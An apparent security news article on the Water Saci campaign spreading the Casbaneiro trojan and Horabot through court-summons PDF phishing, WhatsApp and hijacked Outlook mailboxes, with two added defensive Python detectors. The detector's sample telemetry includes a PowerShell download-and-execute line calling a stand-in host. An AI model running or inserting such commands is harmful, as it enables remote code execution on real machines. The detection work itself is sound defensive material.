Latin American and European Organizations Targeted by Sophisticated Banking Trojan Campaign

A sophisticated phishing campaign is targeting Spanish-speaking users across Latin America and Europe to distribute the Casbaneiro banking trojan (also known as Metamorfo), using a second component called Horabot for propagation. The campaign is attributed to the Brazilian cybercrime group tracked as Augmented Marauder and Water Saci, whose activity Trend Micro first documented in October 2025. Since then the group has broadened its tradecraft to combine social engineering, WhatsApp Web automation, and hijacked victim mailboxes to reach both consumer and enterprise targets.

Overview of the Campaign

The attack typically begins with a phishing email posing as a court summons that carries a password-protected PDF attachment; the password protection also keeps the document opaque to mail gateway scanning, since the content cannot be inspected without the password. A link inside the PDF downloads a ZIP archive containing an HTML Application (HTA) and a Visual Basic Script (VBS) payload. The VBS performs anti-analysis checks, including looking for installed antivirus products, before retrieving further payloads from remote servers. Among these are AutoIt-based loaders that decrypt and execute the next stage, deploying two malware families: Casbaneiro ("staticdata.dll") and Horabot ("at.dll").

Casbaneiro is the primary payload. It contacts a command-and-control server to fetch a PowerShell script that uses Horabot to propagate through phishing emails sent from the infected user's own Microsoft Outlook account. Unlike earlier campaigns, this script generates a fresh password-protected PDF impersonating a Spanish judicial summons for each message, tailoring every lure to its recipient.

Horabot also functions as a spam and account-hijacking tool that abuses Yahoo, Live, and Gmail accounts to spread the malware further. This two-pronged approach has let the attackers reach enterprise networks in Europe while targeting retail and consumer users in Latin America through WhatsApp automation.

Historical Context of Water Saci Operations

Water Saci has a documented history of using WhatsApp Web to distribute banking trojans such as Maverick and Casbaneiro in a worm-like fashion. More recent campaigns, highlighted by Kaspersky, add ClickFix social engineering to trick users into running malicious HTA files, which install Casbaneiro and trigger the Horabot propagation mechanism. The combination of dynamic PDF generation, WhatsApp-based delivery, and mailbox hijacking shows how adaptable the group has become.

What Undercode Says:

Advanced Social Engineering Tactics

The combination of court-summons PDFs, ClickFix prompts, and WhatsApp-based dissemination shows that the operators understand their targets. The lures lean on authority (a judicial notice), urgency (a deadline to respond), and familiarity (a message arriving from a known contact's account), which is why they succeed against otherwise careful users.

Multi-Layered Malware Infrastructure

By using Horabot for propagation and Casbaneiro as the primary payload, Water Saci separates distribution from the core infection. This modular design lets the operators change lures, delivery channels, or payloads independently, and it complicates detection because no single component carries the whole chain: defenders have to correlate the stages rather than match one file.

Dynamic Malware Generation

Generating a bespoke, password-protected PDF for each victim means every attachment has a different hash and the gateway cannot inspect the encrypted content at all. Signature matching on the attachment therefore sees very little; the durable indicators are the delivery pattern itself (an encrypted PDF arriving as a judicial notice) and the behavior that follows once the recipient opens it and clicks the link.
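
The encrypted-attachment pattern described in the overview and in this section is something a mail gateway can act on even though it cannot read the document. The following is an added example for this article, not code from the original report or from any vendor product: it detects whether a PDF is encrypted by looking for the /Encrypt entry in its trailer dictionary (or in the cross-reference stream dictionary of PDF 1.5+ files) and escalates when the message body also contains a password keyword. The PDF skeletons, the lure text, the function names and the quarantine policy are constructed for illustration.

```python
"""Mail-gateway check for password-protected PDF lures.

Added example, not from the original article. An encrypted PDF declares an
/Encrypt entry in its trailer dictionary (classic xref tables) or in the
dictionary of its cross-reference stream (PDF 1.5+). The gateway cannot see
the content, so the policy here holds such attachments and quarantines when
the body hands over the password. PDF bytes and lure text are constructed
and deliberately minimal (no valid xref offsets).
"""
import re

ENCRYPT_KEY = re.compile(rb"/Encrypt\b")
TRAILER_DICT = re.compile(rb"trailer\s*<<(.*?)>>", re.DOTALL)
XREF_TYPE = re.compile(rb"/Type\s*/XRef\b")
# Words that usually introduce the password handoff in Spanish, Portuguese and English lures.
PASSWORD_WORDS = re.compile(r"\b(contrase[ñn]a|clave|senha|password)\b", re.IGNORECASE)


def _trailer_dicts(data: bytes):
    """Yield the bytes of every classic trailer dictionary and every xref-stream dictionary."""
    for m in TRAILER_DICT.finditer(data):
        yield m.group(1)
    for m in XREF_TYPE.finditer(data):
        start = data.rfind(b"<<", 0, m.start())
        end = data.find(b">>", m.end())
        if start != -1 and end != -1:
            yield data[start:end]


def pdf_is_encrypted(data: bytes) -> bool:
    """True when any trailer (incremental updates included) references an /Encrypt dictionary."""
    if not data.startswith(b"%PDF-"):
        raise ValueError("not a PDF header")
    return any(ENCRYPT_KEY.search(d) for d in _trailer_dicts(data))


def classify_message(body: str, attachments: dict) -> dict:
    """Gateway decision: deliver, hold encrypted PDFs, quarantine when the body supplies the password."""
    findings = [f"encrypted_pdf:{name}" for name, blob in attachments.items()
                if name.lower().endswith(".pdf") and pdf_is_encrypted(blob)]
    if findings and PASSWORD_WORDS.search(body):
        findings.append("password_in_body")
    if "password_in_body" in findings:
        action = "quarantine"
    elif findings:
        action = "hold_for_review"
    else:
        action = "deliver"
    return {"action": action, "findings": findings}


# Constructed skeletons: enough structure for the trailer check, not valid documents.
PLAIN_PDF = (b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
             b"trailer\n<< /Size 4 /Root 1 0 R >>\nstartxref\n0\n%%EOF\n")
ENCRYPTED_PDF = (b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
                 b"5 0 obj << /Filter /Standard /V 2 /R 3 /Length 128 /P -3904 >> endobj\n"
                 b"trailer\n<< /Size 6 /Root 1 0 R /Encrypt 5 0 R >>\nstartxref\n0\n%%EOF\n")
XREF_STREAM_ENCRYPTED_PDF = (b"%PDF-1.5\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
                             b"7 0 obj << /Type /XRef /Size 8 /W [1 2 1] /Root 1 0 R /Encrypt 5 0 R /Length 0 >>\n"
                             b"stream\nendstream\nendobj\nstartxref\n0\n%%EOF\n")
LURE_BODY = ("Estimado usuario, se adjunta la citación judicial. "
             "La contraseña del documento es su número de expediente.")

if __name__ == "__main__":
    print(classify_message(LURE_BODY, {"citacion.pdf": ENCRYPTED_PDF}))
    print(classify_message("Adjunto el informe mensual.", {"informe.pdf": PLAIN_PDF}))
```

The trailer-only check is deliberate: grepping the whole file for /Encrypt would also match content streams and produce false positives, while an encrypted document must carry the key in a trailer or xref-stream dictionary to be openable at all. Holding every encrypted PDF is a policy choice; organizations that legitimately exchange encrypted documents should pair it with an allow-list of senders rather than switching the check off.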

Cross-Regional Targeting

While Latin American users are the main targets of the WhatsApp-based attacks, the campaign simultaneously reaches European enterprises through Horabot's email propagation. Running both channels at once indicates a mature operation capable of managing geographically diverse campaigns concurrently.

Exploitation of Common Productivity Tools

Sending the phishing emails through the victim's own Microsoft Outlook client means the messages originate from a legitimate account at a known correspondent: they pass the sending domain's SPF, DKIM, and DMARC checks and carry the victim's real address and display name. Abusing a trusted productivity tool this way maximizes reach while reducing suspicion from recipients and from filters that key on sender reputation.

Persistent Threat Evolution

The actor has evolved from simple worm-like WhatsApp distribution to a blend of automation, per-victim content generation, and multi-vector email phishing. This trend signals that attackers are investing in adaptive infrastructure designed to outlast point defenses.

Implications for Enterprises

Organizations with European operations are the main enterprise targets of Horabot's email propagation. Once a single mailbox is compromised, the malware uses it to phish colleagues and partners, so the blast radius is the organization's contact graph rather than one workstation. Beyond the banking fraud Casbaneiro enables, a foothold in an enterprise network puts sensitive data at risk, with the attendant financial and reputational damage. Behavior-based endpoint protection and user education both matter here.

Consumer-Level Risks

Consumers in Latin America face persistent exposure through WhatsApp and ClickFix lures. Because these attacks exploit social trust (the message arrives from a contact), even tech-savvy users can fall victim if they skip the basic checks. Multi-factor authentication on mail and messaging accounts limits what a stolen credential buys, and unsolicited attachments or "fix" instructions should be verified with the sender out of band before anything is run.

Threat Actor Reputation and Capabilities

Water Saci's combination of automation, social engineering, and modular malware distribution matches the profile of an organized, financially motivated cybercrime collective. Sustaining campaigns over many months demonstrates operational resilience and resources, and implies deliberate planning and coordination.

Defensive Recommendations

Defensive strategies should focus on the chain this campaign actually uses: quarantine or hold password-protected attachments that gateways cannot inspect; restrict or monitor the Windows script hosts (mshta.exe, wscript.exe, cscript.exe) and AutoIt interpreters executing from user-writable directories; alert on PowerShell automating Outlook, or on a mailbox that suddenly sends many messages with attachments; and watch for unusual outbound connections from newly spawned script processes. User training that emphasizes verifying attachments and links with the purported sender is equally essential.
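
The behavioral side of these recommendations, applied to the execution chain laid out in the overview, is shown below as an added example for this article; it is not code from the original report or from any vendor. It scores Sysmon Event ID 1 style process-creation records against four stages of the chain: a script host opening a file from an extracted ZIP, a script host spawning a second stage, an AutoIt interpreter running from a user-writable directory, and PowerShell driving Outlook. Field names, rule names, the sample events and the domain stage.example.invalid are constructed; the Outlook indicator assumes the propagation script instantiates the Outlook.Application COM object, which the article does not specify.

```python
"""Behavioral detection for an HTA/VBS -> AutoIt loader -> Outlook propagation chain.

Added example, not from the original article. Records are Sysmon Event ID 1
style process creations; field names and sample events are constructed.
"""
import re
from dataclasses import dataclass

# Paths an ordinary user can write to, including where Explorer extracts ZIP
# members (%TEMP%\Temp1_*.zip\), Downloads, AppData and ProgramData.
USER_WRITABLE = re.compile(
    r"\\users\\[^\\]+\\(appdata|downloads)\\|\\(windows\\)?temp\\|\\programdata\\",
    re.IGNORECASE,
)
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
SECOND_STAGE = {"powershell.exe", "pwsh.exe", "cmd.exe", "autoit3.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
OUTLOOK_COM = re.compile(r"outlook\.application", re.IGNORECASE)  # assumed COM indicator


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str
    parent_image: str


def _name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def script_host_from_user_dir(ev: ProcEvent) -> bool:
    """mshta/wscript/cscript opening an .hta/.vbs that lives in a user-writable path."""
    return _name(ev.image) in SCRIPT_HOSTS and bool(USER_WRITABLE.search(ev.cmdline))


def script_host_spawns_stage2(ev: ProcEvent) -> bool:
    """A script host launching PowerShell, cmd or AutoIt (the VBS fetching the loader)."""
    return _name(ev.parent_image) in SCRIPT_HOSTS and _name(ev.image) in SECOND_STAGE


def autoit_from_user_dir(ev: ProcEvent) -> bool:
    """AutoIt interpreter executing from a dropped location rather than an install directory."""
    return _name(ev.image) == "autoit3.exe" and bool(USER_WRITABLE.search(ev.image))


def powershell_drives_outlook(ev: ProcEvent) -> bool:
    """PowerShell instantiating Outlook via COM, or Outlook started by a script host or PowerShell."""
    if _name(ev.image) in POWERSHELL and OUTLOOK_COM.search(ev.cmdline):
        return True
    return _name(ev.image) == "outlook.exe" and _name(ev.parent_image) in SCRIPT_HOSTS | POWERSHELL


RULES = (script_host_from_user_dir, script_host_spawns_stage2,
         autoit_from_user_dir, powershell_drives_outlook)


def analyze(events):
    """Return (rule_name, pid) for every rule that fires, in event order."""
    return [(rule.__name__, ev.pid) for ev in events for rule in RULES if rule(ev)]


def chain_detected(events, min_rules: int = 2) -> bool:
    """Call the host compromised when at least min_rules distinct stages are observed."""
    return len({name for name, _ in analyze(events)}) >= min_rules


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
AUTOIT = r"C:\Users\ana\AppData\Roaming\Bnm\AutoIt3.exe"

SAMPLE_EVENTS = [  # constructed telemetry, not from a real incident
    # victim double-clicks the .vbs inside the downloaded ZIP
    ProcEvent(4200, 4100, r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\wscript.exe" "C:\Users\ana\AppData\Local\Temp\Temp1_citacion.zip\citacion.vbs"',
              EXPLORER),
    # the VBS pulls the next stage with PowerShell
    ProcEvent(4300, 4200, PS,
              "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://stage.example.invalid/l')\"",
              r"C:\Windows\System32\wscript.exe"),
    # dropped AutoIt interpreter runs the encrypted loader script
    ProcEvent(4400, 4300, AUTOIT,
              r'"C:\Users\ana\AppData\Roaming\Bnm\AutoIt3.exe" "C:\Users\ana\AppData\Roaming\Bnm\l.a3x"', PS),
    # propagation script drives the victim's Outlook
    ProcEvent(4500, 4400, PS,
              'powershell.exe -c "$o = New-Object -ComObject Outlook.Application; $m = $o.CreateItem(0)"',
              AUTOIT),
    # benign activity that must not fire
    ProcEvent(5000, 4100, r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE", "OUTLOOK.EXE", EXPLORER),
    ProcEvent(5100, 5050, PS, r"powershell.exe -File C:\Scripts\backup.ps1", r"C:\Windows\System32\svchost.exe"),
]

if __name__ == "__main__":
    for rule, pid in analyze(SAMPLE_EVENTS):
        print(f"{rule:28s} pid={pid}")
    print("chain detected:", chain_detected(SAMPLE_EVENTS))
```

Each rule on its own is noisy in some environments (administrators do run AutoIt and automate Outlook); requiring two distinct stages on the same host before alerting is what turns these into a usable detection of the chain rather than of any one tool.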

🔍 Fact Checker Results:

✅ Water Saci has a documented history of WhatsApp-based malware distribution.
✅ Casbaneiro is a confirmed banking trojan active in Latin America and Europe; Horabot is a confirmed propagation and account-hijacking tool used alongside it.
❌ No evidence suggests the malware has destructive or physical effects; its impact is financial fraud, credential theft, and data theft.

📊 Prediction:

The sophistication of this campaign suggests that Water Saci will keep refining multi-vector attacks and may expand to additional regions. Organizations should expect more dynamic phishing, with further use of automated social engineering on messaging platforms and enterprise email. Enhanced monitoring, behavior- or AI-based detection that correlates the stages of the chain rather than individual files, and region-specific security awareness programs will be critical in preventing future breaches.



References:

Reported By: thehackernews.com
